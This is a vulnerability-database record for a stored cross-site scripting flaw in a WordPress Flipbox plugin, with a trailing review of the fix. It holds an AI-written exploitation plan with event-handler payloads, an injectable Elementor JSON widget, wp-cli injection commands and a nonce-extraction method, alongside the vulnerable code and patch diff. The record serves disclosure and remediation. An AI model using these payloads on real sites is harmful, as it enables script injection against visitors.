[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fehyQUlES7YqmJ34qCrAh4_MYaSWpR10dvyRPl6OlLjg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":33,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":39},"CVE-2026-6048","flipbox-addon-for-elementor-authenticated-author-stored-cross-site-scripting-via-custom-attributes","Flipbox Addon for Elementor \u003C= 2.1.1 - Authenticated (Author+) Stored Cross-Site Scripting via Custom Attributes","The Flipbox Addon for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Flipbox widget's button URL `custom_attributes` field in all versions up to, and including, 2.1.1 due to insufficient validation of custom attribute names. Specifically, the plugin uses `esc_html()` on the attribute name which does not prevent event handler attributes (e.g., `onmouseover`, `onclick`). 
This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","ultimate-flipbox-addon-for-elementor",null,"\u003C=2.0.8","2.1.2","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-17 14:40:16","2026-04-18 03:37:05",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ffaa6ad51-7b3b-4fe1-95fa-e9b63943d533?source=api-prod",1,[22,23,24,25,26,27],"readme.txt","ultimate-flipbox-addon-for-elementor.php","widget\u002Fsimple\u002Fufae-frontend\u002Fclass-ufae-frontend-item.php","widget\u002Fsimple\u002Fufae-frontend\u002Fclass-ufae-frontend-output.php","widget\u002Fstories\u002Fufae-frontend\u002Fclass-ufae-frontend-loop.php","widget\u002Fstories\u002Fufae-frontend\u002Fclass-ufae-frontend-output.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-6048\n\n## 1. Vulnerability Summary\nThe **Flipbox Addon for Elementor** plugin (up to version 2.1.1) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the way custom attributes for flipbox buttons are rendered on the frontend. Specifically, the plugin uses `esc_html()` to sanitize the **attribute name** (key) of custom attributes provided in the Elementor widget settings. While `esc_html()` prevents breaking out of HTML tags, it does not prevent the use of valid HTML event handlers like `onmouseover`, `onclick`, or `onerror`. An attacker with Author-level permissions can inject arbitrary JavaScript by providing an event handler as the attribute name.\n\n## 2. 
Attack Vector Analysis\n*   **Widget Types:** `Basic Flipbox` (Simple), `Story Flipbox` (Stories), or `Post Flipbox`.\n*   **Vulnerable Parameter:** The `custom_attributes` field within the `button_link` control settings.\n*   **Endpoint:** WordPress Post Editor (Elementor) or direct `wp-json\u002Fwp\u002Fv2\u002Fposts` or `admin-ajax.php` (elementor_ajax).\n*   **Required Role:** Author or higher (any role capable of editing posts and using Elementor).\n*   **Payload Format:** `attribute_name|attribute_value` (e.g., `onmouseover|alert(1)`).\n\n## 3. Code Flow\nThe trace follows the rendering of the \"Simple\" flipbox widget:\n1.  **Entry:** `UFAE\\Widget\\Simple\\Ufae_Frontend\\Ufae_Frontend_Output::render()` is called when the widget is displayed.\n2.  **Item Generation:** `render()` calls `$this->loop_obj->flipbox_items()`, which instantiates `UFAE\\Widget\\Simple\\Ufae_Frontend\\Ufae_Frontend_Item`.\n3.  **Side Rendering:** `flipbox_items()` calls `render_sides_content( 'front', '' )` and `render_sides_content( 'back', '' )`.\n4.  **Element Rendering:** `render_sides_content()` iterates through elements (icon, title, desc, button) and calls `$this->render_button( $side )`.\n5.  **Sink:** Inside `render_button()` (inferred based on patch description), the plugin retrieves the settings for the button link:\n    *   The setting `ufae_simple_' . $side . '_button_link` contains a `custom_attributes` string.\n    *   The plugin parses this string (likely using `explode('|', ...)`) and renders it.\n    *   **Vulnerable Code Path:** `echo ' ' . esc_html( $attr_name ) . '=\"' . esc_attr( $attr_value ) . '\"';`\n    *   Since `esc_html('onmouseover')` remains `onmouseover`, an attacker can inject an event handler.\n\n## 4. Nonce Acquisition Strategy\nWhile an Author can use the Elementor UI directly, an automated exploit via the `admin-ajax.php` endpoint requires a nonce for the `elementor_ajax` action.\n\n1.  **Action:** `elementor_ajax`\n2.  
**Strategy:** \n    *   Navigate to the Elementor editor for a specific post: `\u002Fwp-admin\u002Fpost.php?post=POST_ID&action=elementor`.\n    *   Use `browser_eval` to extract the nonce from the Elementor configuration object.\n    *   **JavaScript Variable:** `window.elementorCommonConfig.ajax.nonce`\n3.  **Alternative:** Since this is a Stored XSS requiring Author privileges, the simplest method for a PoC is to use `wp post meta update` to inject the payload directly into the `_elementor_data` field, bypassing the need for an AJAX nonce during setup.\n\n## 5. Exploitation Strategy\nThe goal is to inject a flipbox widget into a post where the button has a malicious `onmouseover` attribute.\n\n### Step 1: Authentication\nLogin to the WordPress instance as an **Author** user.\n\n### Step 2: Create a Target Post\nCreate a new post that will host the Flipbox widget.\n```bash\nwp post create --post_type=post --post_status=publish --post_title=\"XSS Test Page\" --post_author=AUTHOR_ID\n```\n\n### Step 3: Inject Malicious Elementor Data\nThe `_elementor_data` meta field stores the widget configuration as a JSON string. We will inject a `ufae-flipbox` widget.\n\n**Payload JSON structure (`payload.json`):**\n```json\n[\n  {\n    \"id\": \"exploit_id\",\n    \"elType\": \"widget\",\n    \"settings\": {\n      \"ufae_simple_front_button_enable\": \"yes\",\n      \"ufae_simple_front_button_text\": \"Click Me\",\n      \"ufae_simple_front_button_link\": {\n        \"url\": \"https:\u002F\u002Fgoogle.com\",\n        \"is_external\": \"\",\n        \"nofollow\": \"\",\n        \"custom_attributes\": \"onmouseover|alert(document.domain)\"\n      }\n    },\n    \"widgetType\": \"ufae-simple-flipbox\"\n  }\n]\n```\n\nApply the payload:\n```bash\nwp post meta update [POST_ID] _elementor_data --format=json \u003C payload.json\nwp post meta update [POST_ID] _elementor_edit_mode \"builder\"\n```\n\n### Step 4: Trigger the XSS\n1.  
Use `browser_navigate` to visit the post's permalink.\n2.  The flipbox will render. \n3.  Hovering over the front side of the flipbox (where the button is rendered) will trigger the `onmouseover` event.\n\n## 6. Test Data Setup\n*   **Plugin:** Flipbox Addon for Elementor \u003C= 2.1.1.\n*   **Dependencies:** Elementor plugin must be active.\n*   **User:** A user with the `Author` role.\n*   **Content:** A single post (ID: `[POST_ID]`) configured to use the Elementor builder.\n\n## 7. Expected Results\n*   The HTML source of the rendered page should contain: `\u003Ca ... onmouseover=\"alert(document.domain)\" ...>`.\n*   When a browser user hovers over the button in the Flipbox, a JavaScript alert showing the document domain should appear.\n\n## 8. Verification Steps\n1.  **Database Check:**\n    ```bash\n    wp post meta get [POST_ID] _elementor_data\n    ```\n    Confirm the `custom_attributes` contains `onmouseover|alert(document.domain)`.\n2.  **HTML Verification:**\n    Use the `http_request` tool to fetch the post content and grep for the payload:\n    ```bash\n    # Shell equivalent of the http_request check; POST_URL is a placeholder for the post's permalink\n    curl -s \"$POST_URL\" | grep -qF 'onmouseover=\"alert(document.domain)\"' \\\n      && echo \"Vulnerability Confirmed\"\n    ```\n\n## 9. 
Alternative Approaches\nIf the `ufae-simple-flipbox` widget type does not render the button as expected, try the \"Story Flipbox\" widget:\n*   **Widget Type:** `ufae-stories-flipbox`\n*   **Repeater Key:** `ufae_lists` (this is a repeater control).\n*   **Settings Path:** Within an item in `ufae_lists`, set `ufae_front_button_link` with `custom_attributes` set to `onclick|console.log(window.origin)`.\n\n**Example Story JSON snippet:**\n```json\n{\n  \"widgetType\": \"ufae-stories-flipbox\",\n  \"settings\": {\n    \"ufae_lists\": [\n      {\n        \"ufae_front_button_enable\": \"yes\",\n        \"ufae_front_button_link\": {\n          \"custom_attributes\": \"onmouseover|alert(1)\"\n        }\n      }\n    ]\n  }\n}\n```","The Flipbox Addon for Elementor plugin is vulnerable to authenticated stored Cross-Site Scripting (XSS) due to insufficient sanitization of custom attribute names in the Flipbox widget's button. An attacker with Author-level permissions can use event handlers like 'onmouseover' as attribute keys, allowing them to execute arbitrary JavaScript when a user interacts with the flipbox on the frontend.","\u002F\u002F widget\u002Fsimple\u002Fufae-frontend\u002Fclass-ufae-frontend-item.php lines 260-264\n$custom_attr   = isset( $btn_url_setting['custom_attributes'] ) && ! empty( $btn_url_setting['custom_attributes'] ) ? explode( '|', $btn_url_setting['custom_attributes'] ) : array();\n\n$custom_attr = count( $custom_attr ) > 1 ? esc_html( $custom_attr[0] ) . '=\"' . esc_attr( $custom_attr[1] ) . '\"' : '';\n\n\u002F\u002F phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- all content sanitized using escaping function before using.\necho '\u003Ca href=\"' . esc_url( $btn_url ) . '\" class=\"ufae-button\" target=\"' . esc_attr( $blank_attr ) . '\" rel=\"' . esc_attr( $nofollow_attr ) . '\" ' . trim( $custom_attr ) . '>' . esc_html( $btn_text ) . 
'\u003C\u002Fa>';","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fultimate-flipbox-addon-for-elementor\u002F2.1.1\u002Fwidget\u002Fsimple\u002Fufae-frontend\u002Fclass-ufae-frontend-item.php\t2026-02-14 20:18:16.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fultimate-flipbox-addon-for-elementor\u002F2.1.2\u002Fwidget\u002Fsimple\u002Fufae-frontend\u002Fclass-ufae-frontend-item.php\t2026-04-13 18:43:52.000000000 +0000\n@@ -249,15 +249,11 @@\n \t\t\t\t$btn_url         = isset($btn_url_setting['url']) && ! empty($btn_url_setting['url']) ? $btn_url_setting['url'] : false;\n \n \t\t\t\techo '\u003Cdiv class=\"ufae-btn-wrapper\">';\n-\t\t\t\tif ( $btn_url ) {\n-\t\t\t\t\t$blank_attr    = isset( $btn_url_setting['is_external'] ) && 'on' === $btn_url_setting['is_external'] ? '_blank' : '_self';\n-\t\t\t\t\t$nofollow_attr = isset( $btn_url_setting['nofollow'] ) && 'on' === $btn_url_setting['nofollow'] ? 'nofollow' : '';\n-\t\t\t\t\t$custom_attr   = isset( $btn_url_setting['custom_attributes'] ) && ! empty( $btn_url_setting['custom_attributes'] ) ? explode( '|', $btn_url_setting['custom_attributes'] ) : array();\n-\n-\t\t\t\t\t$custom_attr = count( $custom_attr ) > 1 ? esc_html( $custom_attr[0] ) . '=\"' . esc_attr( $custom_attr[1] ) . '\"' : '';\n-\t\t\t\t\t\n-\t\t\t\t\t\u002F\u002F phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- all content sanitized using escaping function before using.\n-\t\t\t\t\techo '\u003Ca href=\"' . esc_url( $btn_url ) . '\" class=\"ufae-button\" target=\"' . esc_attr( $blank_attr ) . '\" rel=\"' . esc_attr( $nofollow_attr ) . '\" ' . trim( $custom_attr ) . '>' . esc_html( $btn_text ) . 
'\u003C\u002Fa>';\n+\t\t\t\tif ($btn_url) {\n+\t\t\t\t\t$this->parent_obj->add_link_attributes('ufae_button_link', $btn_url_setting);\n+\t\t\t\t\t\u002F\u002F phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- no need escaping all attributes sanitized before using.\n+\t\t\t\t\techo '\u003Ca class=\"ufae-button\" ' . $this->parent_obj->get_render_attribute_string('ufae_button_link') . '>' . esc_html($btn_text) . '\u003C\u002Fa>';\n \t\t\t\t} else {\n \t\t\t\t\techo '\u003Cbutton class=\"ufae-button\">' . esc_html( $btn_text ) . '\u003C\u002Fbutton>';\n \t\t\t\t}","The exploit requires an attacker with Author-level privileges or higher to access the Elementor page builder. \n1. Login to WordPress as an Author.\n2. Create or edit a post using Elementor.\n3. Add a 'Basic Flipbox' (ufae-simple-flipbox) or 'Story Flipbox' widget to the page.\n4. Locate the Button settings for either the front or back side of the flipbox.\n5. In the URL control, find the 'Custom Attributes' field (standard Elementor link feature).\n6. Enter a payload using an HTML event handler as the key and a script as the value, separated by a pipe character, e.g., 'onmouseover|alert(document.domain)'.\n7. Save the page and view it as a site visitor. \n8. 
Hovering over the flipbox button will trigger the JavaScript payload because the plugin used esc_html() on the attribute key, which allowed the 'onmouseover' event handler to be rendered literally into the \u003Ca> tag.","gemini-3-flash-preview","2026-04-20 13:20:00","2026-04-20 13:20:33",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","2.1.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fultimate-flipbox-addon-for-elementor\u002Ftags\u002F2.1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fultimate-flipbox-addon-for-elementor.2.1.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fultimate-flipbox-addon-for-elementor\u002Ftags\u002F2.1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fultimate-flipbox-addon-for-elementor.2.1.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fultimate-flipbox-addon-for-elementor\u002Ftags"]
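Review bot: In the added lines of the `@@ -249,15 +249,11 @@` hunk, the render-attribute key `'ufae_button_link'` passed to `add_link_attributes()` and read back with `get_render_attribute_string()` is a fixed string, so every button rendered through the same `$this->parent_obj` shares one attribute set. If that set is not reset between calls, a later button (for example the back side after the front side) could carry the earlier button's href, target or custom attributes; a per-side or per-item key would avoid that. The `phpcs:ignore` on the new `echo` also means the output now relies entirely on `add_link_attributes()` rejecting unsafe attribute names, so the comment should say which function does the sanitizing, and the same change should be confirmed in the other files listed in `patch_diff_files`, which this diff does not show.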